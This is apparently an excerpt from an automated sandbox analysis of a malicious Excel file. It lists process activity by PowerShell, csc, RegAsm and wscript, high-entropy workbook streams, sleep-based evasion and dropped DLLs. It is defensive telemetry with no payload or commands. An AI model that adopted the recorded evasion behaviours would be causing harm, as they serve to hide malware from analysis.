                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: QPS-36477.xlsStream path 'MBD001CA3FC/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: QPS-36477.xlsStream path 'Workbook' entropy: 7.9987635045 (max. 8.0)
                    Source: 58430000.0.drStream path 'MBD001CA3FC/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: 58430000.0.drStream path 'Workbook' entropy: 7.99878038771 (max. 8.0)

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040F7E2 Sleep,ExitProcess,30_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,30_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8298Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1446Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2306Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4042Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1751Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 901
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8713
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1688
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1415
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3730
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 488
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 870
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1198
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3618
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.2 %
                    Source: C:\Windows\System32\mshta.exe TID: 3784Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 8298 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 1446 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3932Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3244Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2236Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2744Thread sleep count: 4042 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2972Thread sleep count: 1751 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -5534023222112862s >= -30000sJump to behavior
